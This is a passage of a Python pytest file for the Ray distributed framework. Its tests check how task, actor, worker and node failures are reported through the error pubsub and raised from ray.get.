wait_for_condition,
SignalActor,
init_error_pubsub,
get_error_message,
Semaphore,
)
def test_failed_task(ray_start_regular, error_pubsub):
    """Exceptions raised in remote tasks are pushed to the error pubsub
    and re-raised from ray.get, including multi-return tasks and custom
    exception subclasses."""

    @ray.remote
    def throw_exception_fct1():
        raise Exception("Test function 1 intentionally failed.")

    @ray.remote
    def throw_exception_fct2():
        raise Exception("Test function 2 intentionally failed.")

    @ray.remote(num_returns=3)
    def throw_exception_fct3(x):
        raise Exception("Test function 3 intentionally failed.")

    p = error_pubsub
    # fire-and-forget tasks still report their failure via the pubsub
    throw_exception_fct1.remote()
    throw_exception_fct1.remote()
    msgs = get_error_message(p, 2, ray_constants.TASK_PUSH_ERROR)
    assert len(msgs) == 2
    for msg in msgs:
        assert "Test function 1 intentionally failed." in msg.error_message

    x = throw_exception_fct2.remote()
    try:
        ray.get(x)
    except Exception as e:
        assert "Test function 2 intentionally failed." in str(e)
    else:
        # ray.get should throw an exception.
        assert False

    # every return ref of a failed multi-return task carries the error
    x, y, z = throw_exception_fct3.remote(1.0)
    for ref in [x, y, z]:
        try:
            ray.get(ref)
        except Exception as e:
            assert "Test function 3 intentionally failed." in str(e)
        else:
            # ray.get should throw an exception.
            assert False

    class CustomException(ValueError):
        pass

    @ray.remote
    def f():
        raise CustomException("This function failed.")

    try:
        ray.get(f.remote())
    except Exception as e:
        assert "This function failed." in str(e)
        # the raised error keeps the original type AND is a RayTaskError
        assert isinstance(e, CustomException)
        assert isinstance(e, ray.exceptions.RayTaskError)
        assert "RayTaskError(CustomException)" in repr(e)
    else:
        # ray.get should throw an exception.
        assert False
def test_push_error_to_driver_through_redis(ray_start_regular, error_pubsub):
    # Errors pushed directly through the redis client must arrive on the
    # driver's error pubsub with the given type and message.
    address_info = ray_start_regular
    address = address_info["redis_address"]
    redis_client = ray._private.services.create_redis_client(
        address, password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
    error_message = "Test error message"
    ray.utils.push_error_to_driver_through_redis(
        redis_client, ray_constants.DASHBOARD_AGENT_DIED_ERROR, error_message)
    errors = get_error_message(error_pubsub, 1,
                               ray_constants.DASHBOARD_AGENT_DIED_ERROR)
    assert errors[0].type == ray_constants.DASHBOARD_AGENT_DIED_ERROR
    assert errors[0].error_message == error_message
def test_get_throws_quickly_when_found_exception(ray_start_regular):
    """ray.get on a batch must fail fast as soon as one object errors,
    without waiting for the still-running slow task."""
    # We use an actor instead of functions here. If we use functions, it's
    # very likely that two normal tasks are submitted before the first worker
    # is registered to Raylet. Since `maximum_startup_concurrency` is 1,
    # the worker pool will wait for the registration of the first worker
    # and skip starting new workers. The result is, the two tasks will be
    # executed sequentially, which breaks an assumption of this test case -
    # the two tasks run in parallel.
    @ray.remote
    class Actor(object):
        def bad_func1(self):
            raise Exception("Test function intentionally failed.")

        def bad_func2(self):
            # hard-kill the worker process -> RayActorError
            os._exit(0)

        def slow_func(self, signal):
            # blocks until the driver sends the signal
            ray.get(signal.wait.remote())

    def expect_exception(objects, exception):
        with pytest.raises(ray.exceptions.RayError) as err:
            ray.get(objects)
        assert err.type is exception

    signal1 = SignalActor.remote()
    actor = Actor.options(max_concurrency=2).remote()
    expect_exception(
        [actor.bad_func1.remote(),
         actor.slow_func.remote(signal1)], ray.exceptions.RayTaskError)
    ray.get(signal1.send.remote())

    signal2 = SignalActor.remote()
    actor = Actor.options(max_concurrency=2).remote()
    expect_exception(
        [actor.bad_func2.remote(),
         actor.slow_func.remote(signal2)], ray.exceptions.RayActorError)
    ray.get(signal2.send.remote())
def test_fail_importing_remote_function(ray_start_2_cpus, error_pubsub):
    """A remote function that closes over an unimportable module must
    push REGISTER_REMOTE_FUNCTION_PUSH_ERROR on the workers, and then
    raise (rather than hang) when invoked."""
    p = error_pubsub
    # Create the contents of a temporary Python file.
    temporary_python_file = """
def temporary_helper_function():
    return 1
"""

    f = tempfile.NamedTemporaryFile(suffix=".py")
    f.write(temporary_python_file.encode("ascii"))
    f.flush()
    directory = os.path.dirname(f.name)
    # Get the module name and strip ".py" from the end.
    module_name = os.path.basename(f.name)[:-3]
    sys.path.append(directory)
    try:
        module = __import__(module_name)

        # Define a function that closes over this temporary module. This should
        # fail when it is unpickled.
        @ray.remote
        def g(x, y=3):
            try:
                module.temporary_python_file()
            except Exception:
                # This test is not concerned with the error from running this
                # function. Only from unpickling the remote function.
                pass

        # Invoke the function so that the definition is exported.
        g.remote(1, y=2)
        errors = get_error_message(
            p, 2, ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
        assert errors[0].type == ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR
        assert "No module named" in errors[0].error_message
        assert "No module named" in errors[1].error_message

        # Check that if we try to call the function it throws an exception and
        # does not hang.
        for _ in range(10):
            with pytest.raises(
                    Exception, match="This function was not imported properly."):
                ray.get(g.remote(1, y=2))
    finally:
        # Run cleanup even when an assertion above fails, so the temp
        # file and the sys.path entry do not leak into later tests
        # (the original skipped this on failure).
        f.close()
        # Clean up the junk we added to sys.path.
        sys.path.pop(-1)
def test_failed_function_to_run(ray_start_2_cpus, error_pubsub):
    # run_function_on_all_workers failures must be reported once per
    # worker (2 CPUs -> 2 workers -> 2 errors).
    p = error_pubsub

    def f(worker):
        # only raise on actual workers, not in the driver process
        if ray.worker.global_worker.mode == ray.WORKER_MODE:
            raise Exception("Function to run failed.")

    ray.worker.global_worker.run_function_on_all_workers(f)
    # Check that the error message is in the task info.
    errors = get_error_message(p, 2, ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
    assert len(errors) == 2
    assert errors[0].type == ray_constants.FUNCTION_TO_RUN_PUSH_ERROR
    assert "Function to run failed." in errors[0].error_message
    assert "Function to run failed." in errors[1].error_message
def test_fail_importing_actor(ray_start_regular, error_pubsub):
    """An actor that closes over an unimportable module must report a
    registration error plus an init error, and its methods must raise
    instead of hanging."""
    p = error_pubsub
    # Create the contents of a temporary Python file.
    temporary_python_file = """
def temporary_helper_function():
    return 1
"""

    f = tempfile.NamedTemporaryFile(suffix=".py")
    f.write(temporary_python_file.encode("ascii"))
    f.flush()
    directory = os.path.dirname(f.name)
    # Get the module name and strip ".py" from the end.
    module_name = os.path.basename(f.name)[:-3]
    sys.path.append(directory)
    module = __import__(module_name)

    # Define an actor that closes over this temporary module. This should
    # fail when it is unpickled.
    @ray.remote
    class Foo:
        def __init__(self, arg1, arg2=3):
            self.x = module.temporary_python_file()

        def get_val(self, arg1, arg2=3):
            return 1

    # There should be no errors yet.
    errors = get_error_message(p, 2)
    assert len(errors) == 0

    # Create an actor.
    foo = Foo.remote(3, arg2=0)

    errors = get_error_message(p, 2)
    assert len(errors) == 2

    for error in errors:
        # Wait for the error to arrive.
        if error.type == ray_constants.REGISTER_ACTOR_PUSH_ERROR:
            assert "No module named" in error.error_message
        else:
            # Wait for the error from when the __init__ tries to run.
            assert ("failed to be imported, and so cannot execute this method"
                    in error.error_message)

    # Check that if we try to get the function it throws an exception and
    # does not hang.
    with pytest.raises(Exception, match="failed to be imported"):
        ray.get(foo.get_val.remote(1, arg2=2))

    # Wait for the error from when the call to get_val.
    errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.TASK_PUSH_ERROR
    assert ("failed to be imported, and so cannot execute this method" in
            errors[0].error_message)

    # NOTE(review): this cleanup is skipped whenever an assertion above
    # fails, leaking the temp file and the sys.path entry into later
    # tests - consider wrapping the body in try/finally.
    f.close()

    # Clean up the junk we added to sys.path.
    sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular, error_pubsub):
    """A failing actor constructor pushes a task error; calling a
    method on that (never-initialized) actor reports the constructor
    failure again."""
    p = error_pubsub
    error_message1 = "actor constructor failed"
    error_message2 = "actor method failed"

    @ray.remote
    class FailedActor:
        def __init__(self):
            raise Exception(error_message1)

        def fail_method(self):
            raise Exception(error_message2)

    a = FailedActor.remote()

    # Make sure that we get errors from a failed constructor.
    errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.TASK_PUSH_ERROR
    assert error_message1 in errors[0].error_message

    # Make sure that we get errors from a failed method.
    a.fail_method.remote()
    errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.TASK_PUSH_ERROR
    # the constructor error (message1) is expected here: __init__ never
    # completed, so fail_method itself does not run
    assert error_message1 in errors[0].error_message
def test_failed_actor_method(ray_start_regular, error_pubsub):
    # Counterpart to test_failed_actor_init: with a working constructor,
    # a failing method reports its own error message.
    p = error_pubsub
    error_message2 = "actor method failed"

    @ray.remote
    class FailedActor:
        def __init__(self):
            pass

        def fail_method(self):
            raise Exception(error_message2)

    a = FailedActor.remote()

    # Make sure that we get errors from a failed method.
    a.fail_method.remote()
    errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.TASK_PUSH_ERROR
    assert error_message2 in errors[0].error_message
def test_incorrect_method_calls(ray_start_regular):
    """Wrong arity on an actor constructor/method and unknown method
    names must all raise."""

    @ray.remote
    class Actor:
        def __init__(self, missing_variable_name):
            pass

        def get_val(self, x):
            pass

    # Constructor arity is enforced: too few and too many arguments.
    for bad_ctor_args in ((), (1, 2)):
        with pytest.raises(Exception):
            Actor.remote(*bad_ctor_args)

    # Create an actor the correct number of arguments.
    a = Actor.remote(1)

    # Method arity is enforced the same way.
    for bad_call_args in ((), (1, 2)):
        with pytest.raises(Exception):
            a.get_val.remote(*bad_call_args)

    # Unknown method names raise AttributeError, with or without .remote.
    with pytest.raises(AttributeError):
        a.nonexistent_method()
    with pytest.raises(AttributeError):
        a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular, error_pubsub):
    # A worker that crashes *after* a task completed successfully must
    # push a WORKER_CRASH_PUSH_ERROR.
    p = error_pubsub

    @ray.remote(max_calls=2)
    def f():
        # This is the only reasonable variable we can set here that makes the
        # execute_task function fail after the task got executed.
        worker = ray.worker.global_worker
        worker.function_actor_manager.increase_task_counter = None

    # Running this task should cause the worker to raise an exception after
    # the task has successfully completed.
    f.remote()

    errors = get_error_message(p, 1, ray_constants.WORKER_CRASH_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.WORKER_CRASH_PUSH_ERROR
def test_worker_dying(ray_start_regular, error_pubsub):
    # A worker that exits mid-task must surface WorkerCrashedError to
    # the caller and push a WORKER_DIED_PUSH_ERROR.
    p = error_pubsub

    # Define a remote function that will kill the worker that runs it.
    @ray.remote(max_retries=0)
    def f():
        # eval sidesteps static checks that would reject a bare exit()
        eval("exit()")

    with pytest.raises(ray.exceptions.WorkerCrashedError):
        ray.get(f.remote())

    errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
    assert "died or was killed while executing" in errors[0].error_message
def test_actor_worker_dying(ray_start_regular, error_pubsub):
    # Killing an actor's worker process makes its pending result raise
    # RayActorError, and tasks consuming that result raise RayTaskError.
    p = error_pubsub

    @ray.remote
    class Actor:
        def kill(self):
            # terminate this actor's worker process from inside
            eval("exit()")

    @ray.remote
    def consume(x):
        pass

    a = Actor.remote()
    [obj], _ = ray.wait([a.kill.remote()], timeout=5)
    with pytest.raises(ray.exceptions.RayActorError):
        ray.get(obj)
    with pytest.raises(ray.exceptions.RayTaskError):
        ray.get(consume.remote(obj))
    errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_future_tasks(ray_start_regular, error_pubsub):
    # With max_restarts=0 the actor is not recovered: tasks submitted
    # both before and after the process is killed must all fail.
    p = error_pubsub

    @ray.remote(max_restarts=0)
    class Actor:
        def getpid(self):
            return os.getpid()

        def sleep(self):
            time.sleep(1)

    a = Actor.remote()
    pid = ray.get(a.getpid.remote())
    tasks1 = [a.sleep.remote() for _ in range(10)]
    # SIGKILL the actor's worker process while tasks are queued
    os.kill(pid, 9)
    time.sleep(0.1)
    tasks2 = [a.sleep.remote() for _ in range(10)]
    for obj in tasks1 + tasks2:
        with pytest.raises(Exception):
            ray.get(obj)

    errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
    # Even with no in-flight task at kill time, the next method call on
    # the dead actor (max_restarts=0) must raise.
    @ray.remote(max_restarts=0)
    class Actor:
        def getpid(self):
            return os.getpid()

    a = Actor.remote()
    pid = ray.get(a.getpid.remote())
    os.kill(pid, 9)
    time.sleep(0.1)
    task2 = a.getpid.remote()
    with pytest.raises(Exception):
        ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular,
                                                     error_pubsub):
    # Intentional actor termination (going out of scope or explicit
    # __ray_terminate__) must NOT be reported as an error.
    p = error_pubsub

    @ray.remote
    class Actor:
        def __init__(self):
            # This log is added to debug a flaky test issue.
            print(os.getpid())

        def ping(self):
            pass

    a = Actor.remote()
    # Without this waiting, there seems to be race condition happening
    # in the CI. This is not a fundamental fix for that, but it at least
    # makes the test less flaky.
    ray.get(a.ping.remote())
    # rebinding drops the first actor; the second is terminated explicitly
    a = Actor.remote()
    a.__ray_terminate__.remote()
    time.sleep(1)
    errors = get_error_message(p, 1)
    assert len(errors) == 0, "Should not have propogated an error - {}".format(
        errors)
def test_exception_chain(ray_start_regular):
    """A nested remote failure must surface from ray.get as an
    exception that is both the original type (ZeroDivisionError) and a
    RayTaskError, so callers can catch either."""

    @ray.remote
    def bar():
        return 1 / 0

    @ray.remote
    def foo():
        return ray.get(bar.remote())

    r = foo.remote()
    # The original wrapped ray.get in try/except with no else clause,
    # so the test silently passed if no exception was raised at all.
    # pytest.raises makes the expectation explicit.
    with pytest.raises(ZeroDivisionError) as exc_info:
        ray.get(r)
    assert isinstance(exc_info.value, RayTaskError)
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
    "ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error1(ray_start_object_store_memory, error_pubsub):
    """(Skipped) Getting an evicted object whose producing task is
    still running should push PUT_RECONSTRUCTION_PUSH_ERROR."""
    p = error_pubsub
    num_objects = 3
    object_size = 4 * 10**5

    # Define a task with a single dependency, a numpy array, that returns
    # another array.
    @ray.remote
    def single_dependency(i, arg):
        arg = np.copy(arg)
        arg[0] = i
        return arg

    @ray.remote
    def put_arg_task():
        # Launch num_objects instances of the remote task, each dependent
        # on the one before it. The result of the first task should get
        # evicted.
        args = []
        arg = single_dependency.remote(0, np.zeros(
            object_size, dtype=np.uint8))
        for i in range(num_objects):
            arg = single_dependency.remote(i, arg)
            args.append(arg)

        # Get the last value to force all tasks to finish.
        value = ray.get(args[-1])
        assert value[0] == i

        # Get the first value (which should have been evicted) to force
        # reconstruction. Currently, since we're not able to reconstruct
        # `ray.put` objects that were evicted and whose originating tasks
        # are still running, this for-loop should hang and push an error to
        # the driver.
        ray.get(args[0])

    put_arg_task.remote()

    # Make sure we receive the correct error message.
    errors = get_error_message(p, 1,
                               ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
    "ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error2(ray_start_object_store_memory):
    # This is the same as the previous test, but it calls ray.put directly.
    num_objects = 3
    object_size = 4 * 10**5

    # Define a task with a single dependency, a numpy array, that returns
    # another array.
    @ray.remote
    def single_dependency(i, arg):
        arg = np.copy(arg)
        arg[0] = i
        return arg

    @ray.remote
    def put_task():
        # Launch num_objects instances of the remote task, each dependent
        # on the one before it. The result of the first task should get
        # evicted.
        args = []
        arg = ray.put(np.zeros(object_size, dtype=np.uint8))
        for i in range(num_objects):
            arg = single_dependency.remote(i, arg)
            args.append(arg)

        # Get the last value to force all tasks to finish.
        value = ray.get(args[-1])
        assert value[0] == i

        # Get the first value (which should have been evicted) to force
        # reconstruction. Currently, since we're not able to reconstruct
        # `ray.put` objects that were evicted and whose originating tasks
        # are still running, this for-loop should hang and push an error to
        # the driver.
        ray.get(args[0])

    put_task.remote()

    # Make sure we receive the correct error message.
    # get_error_message(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("Publish happeds before we subscribe it")
def test_version_mismatch(error_pubsub, shutdown_only):
    """Connecting with a mismatched ray version should push a
    VERSION_MISMATCH_PUSH_ERROR to the driver. (Currently skipped: the
    publish happens before the subscription is established.)"""
    ray_version = ray.__version__
    ray.__version__ = "fake ray version"

    ray.init(num_cpus=1)
    p = error_pubsub

    errors = get_error_message(p, 1, ray_constants.VERSION_MISMATCH_PUSH_ERROR)
    # The original had a leftover debugging line `assert False, errors`
    # here, which made the real assertions below unreachable; removed
    # so they run if the test is ever un-skipped.
    assert len(errors) == 1
    assert errors[0].type == ray_constants.VERSION_MISMATCH_PUSH_ERROR

    # Reset the version.
    ray.__version__ = ray_version
def test_export_large_objects(ray_start_regular, error_pubsub):
    # Exporting a remote function or actor whose pickled closure
    # exceeds the warning size must push PICKLING_LARGE_OBJECT_PUSH_ERROR.
    p = error_pubsub
    import ray.ray_constants as ray_constants

    # twice the warning threshold guarantees the warning fires
    large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)

    @ray.remote
    def f():
        large_object

    # Invoke the function so that the definition is exported.
    f.remote()

    # Make sure that a warning is generated.
    errors = get_error_message(p, 1,
                               ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR

    @ray.remote
    class Foo:
        def __init__(self):
            large_object

    Foo.remote()

    # Make sure that a warning is generated.
    errors = get_error_message(p, 1,
                               ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
@pytest.mark.skip(reason="TODO detect resource deadlock")
def test_warning_for_resource_deadlock(error_pubsub, shutdown_only):
    """(Skipped) A blocked task holding the only CPU while waiting on
    actors that can never be placed should push RESOURCE_DEADLOCK_ERROR."""
    p = error_pubsub
    # Check that we get warning messages for infeasible tasks.
    ray.init(num_cpus=1)

    @ray.remote(num_cpus=1)
    class Foo:
        def f(self):
            return 0

    @ray.remote
    def f():
        # Creating both actors is not possible.
        actors = [Foo.remote() for _ in range(2)]
        for a in actors:
            ray.get(a.f.remote())

    # Run in a task to check we handle the blocked task case correctly
    f.remote()
    errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
def test_warning_for_infeasible_tasks(ray_start_regular, error_pubsub):
    """Tasks/actors requesting resources the cluster does not have should
    each push an INFEASIBLE_TASK error."""
    p = error_pubsub
    # Check that we get warning messages for infeasible tasks.

    @ray.remote(num_gpus=1)
    def f():
        pass

    @ray.remote(resources={"Custom": 1})
    class Foo:
        pass

    # This task is infeasible.
    f.remote()
    errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR

    # This actor placement task is infeasible.
    Foo.remote()
    errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
    # Check that we cannot place an actor on a 0 CPU machine and that we get an
    # infeasibility warning (even though the actor creation task itself
    # requires no CPUs).
    ray.init(num_cpus=0)
    p = init_error_pubsub()

    @ray.remote
    class Foo:
        pass

    # The actor creation should be infeasible.
    Foo.remote()
    errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
    p.close()
def test_warning_for_too_many_actors(shutdown_only):
    # Check that if we run a workload which requires too many workers to be
    # started that we will receive a warning.
    num_cpus = 2
    ray.init(num_cpus=num_cpus)
    p = init_error_pubsub()

    @ray.remote
    class Foo:
        def __init__(self):
            # Park each actor forever so workers are never released.
            time.sleep(1000)

    # 3x oversubscription should trigger the first warning.
    [Foo.remote() for _ in range(num_cpus * 3)]
    errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR

    # Additional actors keep the pool oversubscribed; expect another warning.
    [Foo.remote() for _ in range(num_cpus)]
    errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
    p.close()
def test_warning_for_too_many_nested_tasks(shutdown_only):
    # Check that if we run a workload which requires too many workers to be
    # started that we will receive a warning.
    num_cpus = 2
    ray.init(num_cpus=num_cpus)
    p = init_error_pubsub()

    # Semaphores used to force a deterministic submission order between the
    # root tasks (g) and their nested tasks (h/f).
    remote_wait = Semaphore.remote(value=0)
    nested_wait = Semaphore.remote(value=0)

    ray.get([
        remote_wait.locked.remote(),
        nested_wait.locked.remote(),
    ])

    @ray.remote
    def f():
        time.sleep(1000)
        return 1

    @ray.remote
    def h(nested_waits):
        nested_wait.release.remote()
        ray.get(nested_waits)
        ray.get(f.remote())

    @ray.remote
    def g(remote_waits, nested_waits):
        # Sleep so that the f tasks all get submitted to the scheduler after
        # the g tasks.
        remote_wait.release.remote()
        # wait until every lock is released.
        ray.get(remote_waits)
        ray.get(h.remote(nested_waits))

    num_root_tasks = num_cpus * 4
    # Lock remote task until everything is scheduled.
    remote_waits = []
    nested_waits = []
    for _ in range(num_root_tasks):
        remote_waits.append(remote_wait.acquire.remote())
        nested_waits.append(nested_wait.acquire.remote())

    [g.remote(remote_waits, nested_waits) for _ in range(num_root_tasks)]

    errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
    p.close()
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
    """Re-exporting the same remote function/actor class past the duplicate
    threshold should emit a warning on ray.import_thread's logger."""
    ray.init(num_cpus=1)

    @ray.remote
    def create_remote_function():
        @ray.remote
        def g():
            return 1

        return ray.get(g.remote())

    # One export below the threshold; the next one should trip the warning.
    for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
        ray.get(create_remote_function.remote())

    import io
    log_capture_string = io.StringIO()
    ch = logging.StreamHandler(log_capture_string)

    # TODO(rkn): It's terrible to have to rely on this implementation detail,
    # the fact that the warning comes from ray.import_thread.logger. However,
    # I didn't find a good way to capture the output for all loggers
    # simultaneously.
    ray.import_thread.logger.addHandler(ch)

    ray.get(create_remote_function.remote())

    # Poll the captured log for up to 10 seconds.
    start_time = time.time()
    while time.time() < start_time + 10:
        log_contents = log_capture_string.getvalue()
        if len(log_contents) > 0:
            break

    ray.import_thread.logger.removeHandler(ch)

    assert "remote function" in log_contents
    assert "has been exported {} times.".format(
        ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents

    # Now test the same thing but for actors.

    @ray.remote
    def create_actor_class():
        # Require a GPU so that the actor is never actually created and we
        # don't spawn an unreasonable number of processes.
        @ray.remote(num_gpus=1)
        class Foo:
            pass

        Foo.remote()

    for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
        ray.get(create_actor_class.remote())

    log_capture_string = io.StringIO()
    ch = logging.StreamHandler(log_capture_string)

    # TODO(rkn): As mentioned above, it's terrible to have to rely on this
    # implementation detail.
    ray.import_thread.logger.addHandler(ch)

    ray.get(create_actor_class.remote())

    start_time = time.time()
    while time.time() < start_time + 10:
        log_contents = log_capture_string.getvalue()
        if len(log_contents) > 0:
            break

    ray.import_thread.logger.removeHandler(ch)

    assert "actor" in log_contents
    assert "has been exported {} times.".format(
        ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
def test_redis_module_failure(ray_start_regular):
    """Exercise the custom RAY.* Redis module commands, checking both their
    argument-validation failure messages and their success paths."""
    address_info = ray_start_regular
    address = address_info["redis_address"]
    address = address.split(":")
    assert len(address) == 2

    def run_failure_test(expecting_message, *command):
        # The command must raise, and the error text must contain the
        # expected validation message.
        with pytest.raises(
                Exception, match=".*{}.*".format(expecting_message)):
            client = redis.StrictRedis(
                host=address[0],
                port=int(address[1]),
                password=ray_constants.REDIS_DEFAULT_PASSWORD)
            client.execute_command(*command)

    def run_one_command(*command):
        # The command is expected to succeed.
        client = redis.StrictRedis(
            host=address[0],
            port=int(address[1]),
            password=ray_constants.REDIS_DEFAULT_PASSWORD)
        client.execute_command(*command)

    run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
    run_failure_test("Prefix must be in the TablePrefix range",
                     "RAY.TABLE_ADD", 100000, 1, 1, 1)
    run_failure_test("Prefix must be in the TablePrefix range",
                     "RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
    run_failure_test("Prefix must be a valid TablePrefix integer",
                     "RAY.TABLE_ADD", b"a", 1, 1, 1)
    run_failure_test("Pubsub channel must be in the TablePubsub range",
                     "RAY.TABLE_ADD", 1, 10000, 1, 1)
    run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
                     1, b"a", 1, 1)
    # Change the key from 1 to 2, since the previous command should have
    # succeeded at writing the key, but not publishing it.
    run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
                     -1)
    run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
                     b"a")
    run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
    # It's okay to add duplicate entries.
    run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
    run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
    run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
    run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
    # It's okay to add duplicate entries.
    run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
    run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
    # It's okay to remove duplicate entries.
    run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes, error_pubsub):
    """Killing both raylets should produce a REMOVED_NODE error per node,
    naming exactly the nodes that were killed."""
    cluster = ray_start_cluster_2_nodes
    cluster.wait_for_nodes()
    p = error_pubsub

    node_ids = {item["NodeID"] for item in ray.nodes()}

    # Try to make sure that the monitor has received at least one heartbeat
    # from the node.
    time.sleep(0.5)

    # Kill both raylets.
    cluster.list_all_nodes()[1].kill_raylet()
    cluster.list_all_nodes()[0].kill_raylet()

    # Check that we get warning messages for both raylets.
    errors = get_error_message(p, 2, ray_constants.REMOVED_NODE_ERROR, 40)

    # Extract the client IDs from the error messages. This will need to be
    # changed if the error message changes.
    warning_node_ids = {error.error_message.split(" ")[5] for error in errors}

    assert node_ids == warning_node_ids
def test_raylet_crash_when_get(ray_start_regular):
    """ray.get on a freed object should raise ObjectLostError even if the
    raylet dies while the get is in flight."""
    def sleep_to_kill_raylet():
        # Don't kill raylet before default workers get connected.
        time.sleep(2)
        ray.worker._global_node.kill_raylet()

    object_ref = ray.put(np.zeros(200 * 1024, dtype=np.uint8))
    ray.internal.free(object_ref)

    thread = threading.Thread(target=sleep_to_kill_raylet)
    thread.start()
    with pytest.raises(ray.exceptions.ObjectLostError):
        ray.get(object_ref)
    thread.join()
def test_connect_with_disconnected_node(shutdown_only):
    """SIGKILL'd nodes should each be reported dead exactly once; a graceful
    (SIGTERM) removal should produce no error at all."""
    config = {
        "num_heartbeats_timeout": 50,
        "raylet_heartbeat_timeout_milliseconds": 10,
    }
    cluster = Cluster()
    cluster.add_node(num_cpus=0, _system_config=config)
    ray.init(address=cluster.address)
    p = init_error_pubsub()
    errors = get_error_message(p, 1, timeout=5)
    assert len(errors) == 0
    # This node is killed by SIGKILL, ray_monitor will mark it to dead.
    dead_node = cluster.add_node(num_cpus=0)
    cluster.remove_node(dead_node, allow_graceful=False)
    errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
    assert len(errors) == 1
    # This node is killed by SIGKILL, ray_monitor will mark it to dead.
    dead_node = cluster.add_node(num_cpus=0)
    cluster.remove_node(dead_node, allow_graceful=False)
    errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
    assert len(errors) == 1
    # This node is killed by SIGTERM, ray_monitor will not mark it again.
    removing_node = cluster.add_node(num_cpus=0)
    cluster.remove_node(removing_node, allow_graceful=True)
    errors = get_error_message(p, 1, timeout=2)
    assert len(errors) == 0
    # There is no connection error to a dead node.
    errors = get_error_message(p, 1, timeout=2)
    assert len(errors) == 0
    p.close()
@pytest.mark.parametrize(
    "ray_start_cluster_head", [{
        "num_cpus": 5,
        "object_store_memory": 10**8,
        "_system_config": {
            "object_store_full_max_retries": 0
        }
    }],
    indirect=True)
